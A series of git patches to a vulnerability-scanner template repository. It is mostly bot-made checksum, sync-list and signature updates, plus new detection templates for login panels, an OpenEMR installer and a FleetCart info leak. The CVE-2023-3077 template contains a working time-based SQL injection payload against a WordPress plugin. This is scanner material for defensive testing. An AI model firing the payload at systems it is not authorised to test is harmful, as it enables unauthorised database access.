http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e +http/vulnerabilities/other/array-vpn-lfi.yaml:815fd8a47429b3667da9fe4bb5986f73d21f082a http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -8566,7 +8567,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f41a35ec5b35d3ea6df3bf44a7b74a8b96fd20c5 +templates-checksum.txt:89cafe981b94a4525cc814c66be575cfe5abc528 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9e49fb01bb7772c99bb76739be17520819384a7c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:47:34 +0000 Subject: [PATCH 310/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0968c201b8..aa09be641f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: From 1f26a2985eb9425b26d618f6e3246178371e670c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:48:48 +0000 Subject: [PATCH 311/847] Auto Template Signing [Tue May 28 01:48:48 UTC 2024] :robot: --- http/technologies/oracle/default-oracle-application-page.yaml | 1 + http/vulnerabilities/other/array-vpn-lfi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/oracle/default-oracle-application-page.yaml b/http/technologies/oracle/default-oracle-application-page.yaml index 3613c92279..4c0914ebfb 100644 --- a/http/technologies/oracle/default-oracle-application-page.yaml +++ b/http/technologies/oracle/default-oracle-application-page.yaml @@ -26,3 +26,4 @@ http: group: 1 regex: - '(?i)\s+\(([0-9.]+)\)' +# digest: 4a0a0047304502203709028b7add9432a486624c46eee996bbd06f8f692272b6cc7fe0aa4fa8fcbf02210089d3596b1bd759c78e613b064c1eca34fb40bc6cccead5c23eb7f6a2d7535c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index 23520f30de..c8dc14a1bb 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -37,3 +37,4 @@ http: - type: status status: - 401 +# digest: 4a0a004730450221008e24fbcfd7c890e4d363e7fe8e26af87384d919f31b0f80cfac8b2386af6805e0220028f7843b763f24105d68d24ebe88411ed598df53806c37d1a126ce23eb55405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5f9b94ac414678cacb029fd9760cb23b6a5b5cde Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:20:55 +0530 Subject: [PATCH 312/847] minor update --- .../aj-report-rce.yaml => cnvd/2024/CNVD-2024-15077.yaml} | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename http/{vulnerabilities/other/aj-report-rce.yaml => cnvd/2024/CNVD-2024-15077.yaml} (90%) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml similarity index 90% rename from http/vulnerabilities/other/aj-report-rce.yaml rename to http/cnvd/2024/CNVD-2024-15077.yaml index a39694e3c4..983f977fa1 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -1,4 +1,4 @@ -id: aj-report-rce +id: CNVD-2024-15077 info: name: AJ-Report Open Source Data Screen - Remote Code Execution @@ -8,9 +8,12 @@ info: AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. reference: - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md metadata: + verified: true + max-request: 1 fofa-query: title="AJ-Report" - tags: aj-report,rce + tags: cnvd,cnvd2024,aj-report,rce http: - raw: From b83355811f22ab961d101ed76b4323782a6f06fa Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:55:33 +0000 Subject: [PATCH 313/847] Auto Generated New Template Addition List [Tue May 28 01:55:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f7f5cc81ea..5c7d43d121 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml From 9a48bba8793d6c2ae032e2d86ad894fdceb8a038 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:55:43 +0000 Subject: [PATCH 314/847] Auto Generated Templates Checksum [Tue May 28 01:55:43 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a2d1fce4c..da10a12ff7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,6 +878,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 +http/cnvd/2024/CNVD-2024-15077.yaml:887e7fe81022c33cab23d055b11a056f2954ce3e http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 http/credential-stuffing/cloud/atlassian-login-check.yaml:18f7078d79a54b1741f82227ef0ffad50287ba20 @@ -6896,7 +6897,7 @@ http/technologies/openproject-detect.yaml:91c1e50d8a05629807ab0f013c664e6edf7f1e http/technologies/openresty-detect.yaml:255ca922fa6904e6ea0bb314d24516bce3204e96 http/technologies/openssl-detect.yaml:3dedd81330e4f4ae3b6ae11b429e4e0bd5b8580d http/technologies/operations-automation-default-page.yaml:166d229fff5150b81bd81ce6db4c4078bdcff0d5 -http/technologies/oracle/default-oracle-application-page.yaml:e8f83225d2a9f60f31fedf9cc9f76dd7edd0531e +http/technologies/oracle/default-oracle-application-page.yaml:33805aa961eccd1f7b628fb5877f54478f5065ea http/technologies/oracle/oracle-access-manager-detect.yaml:f4287a567c96e6f4ec9da0a832d8691b4b681a7f http/technologies/oracle/oracle-atg-commerce.yaml:f8279ae12859c82558baae4d9df611b74bd875e1 http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28a71e14c90b @@ -7662,7 +7663,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e -http/vulnerabilities/other/array-vpn-lfi.yaml:815fd8a47429b3667da9fe4bb5986f73d21f082a +http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a http/vulnerabilities/other/aspnuke-openredirect.yaml:0253728ab4ba638b3469701d2a70a1f364de32d5 @@ -8567,7 +8568,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:89cafe981b94a4525cc814c66be575cfe5abc528 +templates-checksum.txt:6d4e5de5e32a68caa7c038ae0546baf678dd280c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 26c69a4b117e2b5ea44bcaa8f01568dbe744ac64 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 28 May 2024 01:56:17 +0000 Subject: [PATCH 315/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index aa09be641f..c531aa033b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' From 52c2e81d8b476cfceba3c0be798a9986e0644858 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 May 2024 01:57:29 +0000 Subject: [PATCH 316/847] Auto Template Signing [Tue May 28 01:57:29 UTC 2024] :robot: --- http/cnvd/2024/CNVD-2024-15077.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml index 983f977fa1..204334b5b4 100644 --- a/http/cnvd/2024/CNVD-2024-15077.yaml +++ b/http/cnvd/2024/CNVD-2024-15077.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f53cb46e15663e3740bfc447e0adeeba1a90cc10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:38:36 +0530 Subject: [PATCH 317/847] Create CVE-2023-3077.yaml --- http/cves/2023/CVE-2023-3077.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3077.yaml diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml new file mode 100644 index 0000000000..bb7b1b3fb1 --- /dev/null +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-3077 + +info: + name: MStore API < 3.9.8 - Unauthenticated Blind SQL Injection + author: DhiyaneshDK + severity: critical + description: | + The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter. + impact: | + Allows an attacker to extract sensitive data from the database + remediation: | + Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability + reference: + - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432 + - https://nvd.nist.gov/vuln/detail/CVE-2023-3077 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3077 + epss-score: 0.00148 + epss-percentile: 0.50816 + cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* + metadata: + verified: treu + vendor: inspireui + product: mstore_api + framework: wordpress + publicwww-query: "/wp-content/plugins/mstore-api/" + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + matchers: + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "MStore API")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+-" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + condition: and From eac0581ccbfee6cb94759a4e4127e438f1bfaeac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 May 2024 07:44:39 +0530 Subject: [PATCH 318/847] Create openemr-setup-installer.yaml --- .../installer/openemr-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/openemr-setup-installer.yaml diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml new file mode 100644 index 0000000000..d4675908b6 --- /dev/null +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -0,0 +1,31 @@ +id: openemr-setup-installer + +info: + name: OpenEMR Setup Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed OpenEMR setup installation pages which could allow unauthorized access or information disclosure. + reference: + - https://www.open-emr.org/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"OpenEMR Setup Tool" + tags: misconfig,install,exposure,openemr + +http: + - method: GET + path: + - "{{BaseURL}}/setup.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>OpenEMR Setup Tool" + + - type: status + status: + - 200 From 7e83c80f02ca4bf07157d035e52b630fb56c715d Mon Sep 17 00:00:00 2001 From: dcruzec Date: Mon, 27 May 2024 23:08:23 -0400 Subject: [PATCH 319/847] Add files via upload --- .../cisco-firepower-management-login.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/exposed-panels/cisco-firepower-management-login.yaml diff --git a/http/exposed-panels/cisco-firepower-management-login.yaml b/http/exposed-panels/cisco-firepower-management-login.yaml new file mode 100644 index 0000000000..678a510158 --- /dev/null +++ b/http/exposed-panels/cisco-firepower-management-login.yaml @@ -0,0 +1,37 @@ +id: cisco-firepower-management-login + +info: + name: Cisco Firepower Management Center login - Detect + author: Charles D + severity: info + description: Cisco Firepower Management Centerlogin panel was detected + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: html:"cisco firepower management" + tags: console,login,cisco + +http: + - method: GET + path: + - '{{BaseURL}}/ui/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Cisco Firepower Management Center" + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" \ No newline at end of file From 5a015ead7b354bf1b90580362d3d08f56f975884 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 28 May 2024 11:16:01 +0800 Subject: [PATCH 320/847] Add Gotweb detect --- http/technologies/gotweb-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/technologies/gotweb-detect.yaml diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml new file mode 100644 index 0000000000..63ee6d8b9d --- /dev/null +++ b/http/technologies/gotweb-detect.yaml @@ -0,0 +1,28 @@ +id: gotweb-detect + +info: + name: GotWeb Detect + author: lu4nx + severity: info + description: | + Game of Trees (Got) is a version control system which prioritizes ease of use and simplicity over flexibility. + metadata: + max-request: 1 + zoomeye-query: 'href="/gotweb.css"' + tags: tech,got,gotweb + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - + + - type: status + status: + - 200 From da4ec60ac5f264a2f3fbcb395f964993b55da84f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:36:36 +0530 Subject: [PATCH 321/847] minor update --- http/technologies/gotweb-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml index 63ee6d8b9d..d4c2959378 100644 --- a/http/technologies/gotweb-detect.yaml +++ b/http/technologies/gotweb-detect.yaml @@ -7,6 +7,7 @@ info: description: | Game of Trees (Got) is a version control system which prioritizes ease of use and simplicity over flexibility. metadata: + verified: true max-request: 1 zoomeye-query: 'href="/gotweb.css"' tags: tech,got,gotweb From 247527efad94d6a93e6ae1ab7d8e7a7c363edee8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:42:36 +0530 Subject: [PATCH 322/847] Update and rename cisco-firepower-management-login.yaml to cisco-firepower-panel.yaml --- ...t-login.yaml => cisco-firepower-panel.yaml} | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) rename http/exposed-panels/{cisco-firepower-management-login.yaml => cisco-firepower-panel.yaml} (71%) diff --git a/http/exposed-panels/cisco-firepower-management-login.yaml b/http/exposed-panels/cisco-firepower-panel.yaml similarity index 71% rename from http/exposed-panels/cisco-firepower-management-login.yaml rename to http/exposed-panels/cisco-firepower-panel.yaml index 678a510158..37da40469f 100644 --- a/http/exposed-panels/cisco-firepower-management-login.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -1,30 +1,34 @@ -id: cisco-firepower-management-login +id: cisco-firepower-panel info: name: Cisco Firepower Management Center login - Detect author: Charles D severity: info - description: Cisco Firepower Management Centerlogin panel was detected + description: | + Cisco Firepower Management Centerlogin panel was detected classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: html:"cisco firepower management" - tags: console,login,cisco + verified: true + tags: login,cisco,panel,console http: - method: GET path: - '{{BaseURL}}/ui/login' - + matchers-condition: and matchers: - type: word + part: body words: - "Cisco Firepower Management Center" - part: body - + - "Login" + condition: and + - type: status status: - 200 @@ -34,4 +38,4 @@ http: part: body group: 1 regex: - - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" \ No newline at end of file + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" From a3ccb67b81c7dccdcd4553e0d3e3aa9e1c34bd8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:43:48 +0530 Subject: [PATCH 323/847] minor update --- http/cves/2023/CVE-2023-3077.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index bb7b1b3fb1..2a61a79863 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -28,6 +28,8 @@ info: publicwww-query: "/wp-content/plugins/mstore-api/" tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api +flow: http(1) && http(2) + http: - method: GET path: From 3c31cb5c4e933f6adb0f7fd6a45eecacfd5ac5d1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:54:05 +0530 Subject: [PATCH 324/847] minor update --- http/cves/2024/CVE-2024-5230.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index d9b6f5a47c..64b2bb9e0e 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -9,6 +9,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-5230 - https://packetstormsecurity.com/files/178770/FleetCart-4.1.1-Information-Disclosure.html - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + - https://vuldb.com/?ctiid.265981 + - https://vuldb.com/?id.265981 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -16,18 +18,26 @@ info: cwe-id: CWE-200 epss-score: 0.00045 epss-percentile: 0.15047 - tags: packetstorm,cms,fleetcart + metadata: + verified: true + max-request: 1 + shodan-query: html:"FleetCart" + tags: cve,cve2024,packetstorm,cms,fleetcart,info-leak http: - method: GET path: - "{{BaseURL}}/en/products?query=123" + matchers-condition: and matchers: - type: dsl dsl: - - 'contains(body, "razorpayKeyId:")' - - 'contains(body, "loggedIn:")' - - 'contains(body, "storeName:")' + - 'contains_all(body, "razorpayKeyId:", "loggedIn:", "storeName:")' - 'status_code == 200' condition: and + + - type: word + words: + - "razorpayKeyId: ''" + negative: true From a115cd38cc062ac6d0458c707eb804fe7f4eaeca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:55:42 +0530 Subject: [PATCH 325/847] fix lint --- http/exposed-panels/cisco-firepower-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index 37da40469f..ff88c46fa1 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -38,4 +38,4 @@ http: part: body group: 1 regex: - - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" From 8a431d061657d2aec7995a952ec7d1cb5f91a8f3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:27:47 +0000 Subject: [PATCH 326/847] Auto Generated New Template Addition List [Tue May 28 04:27:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5c7d43d121..5f437a1e93 100644 --- a/.new-additions +++ b/.new-additions @@ -6,5 +6,6 @@ http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/openemr-setup-installer.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2eda65d632ff6ea851a9aeb4a81564668b996505 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:27:59 +0000 Subject: [PATCH 327/847] Auto Generated Templates Checksum [Tue May 28 04:27:59 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index da10a12ff7..de0f4f74b1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,7 +878,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 -http/cnvd/2024/CNVD-2024-15077.yaml:887e7fe81022c33cab23d055b11a056f2954ce3e +http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 http/credential-stuffing/cloud/atlassian-login-check.yaml:18f7078d79a54b1741f82227ef0ffad50287ba20 @@ -5457,6 +5457,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/openemr-setup-installer.yaml:42580122b5f3baf39b6ed9ce05448787892a186e http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 @@ -8568,7 +8569,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6d4e5de5e32a68caa7c038ae0546baf678dd280c +templates-checksum.txt:8ef346790e190638a75fc498b6c1129dd1cf2c83 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f430c1528f9ca8397a7d8d42d08cc88daeeb53a1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:28:36 +0000 Subject: [PATCH 328/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c531aa033b..7796c01f4d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From acef25d5a36b2fa20661c6e1d4308af9943f04b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:28:39 +0000 Subject: [PATCH 329/847] Auto Generated New Template Addition List [Tue May 28 04:28:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5f437a1e93..91904d5827 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-5230.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml From 1cd1e789e42ed27483e5eea42f8295ec87e96928 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:28:52 +0000 Subject: [PATCH 330/847] Auto Generated Templates Checksum [Tue May 28 04:28:52 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index de0f4f74b1..279664685c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b 